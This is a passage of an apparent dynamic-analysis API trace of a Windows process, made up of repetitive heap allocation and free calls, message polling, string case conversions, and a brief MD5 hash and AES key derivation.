hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.743] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.744] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.744] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.744] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.744] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.744] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.744] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.744] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.744] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.744] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.744] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.745] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0264.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.745] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.746] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.746] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.746] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.746] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.746] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.746] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.746] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.746] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.746] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.747] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.747] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.747] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.747] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.747] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.747] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.747] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.747] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.748] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.748] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.748] CryptCreateHash (in: hProv=0xad2c70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0264.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.749] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.749] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.749] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.749] CryptHashData (hHash=0xaa57a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.749] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.750] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.750] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.750] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.750] CryptDeriveKey (in: hProv=0xad2c70, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, 